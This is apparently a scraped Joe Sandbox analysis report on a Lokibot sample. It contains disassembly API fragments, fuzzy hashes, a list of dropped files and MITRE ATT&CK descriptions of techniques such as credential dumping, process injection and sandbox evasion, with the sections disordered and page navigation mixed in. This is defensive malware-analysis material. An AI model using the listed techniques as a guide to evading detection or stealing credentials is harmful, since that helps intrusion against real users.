_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YvVDV4cbjy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HxQXdrrQ.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YvVDV4cbjy.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2icx1gjm.uvl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ggzupuj.1ah.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnhlj0te.r3w.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjsz2jme.zyi.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaq1vkgz.mil.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojh1kutt.gfs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owoiebud.fk2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygbynug1.z4t.psm1

C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp

C:\Users\user\AppData\Local\Temp\tmp31BF.tmp

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Windows Analysis Report
YvVDV4cbjy.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre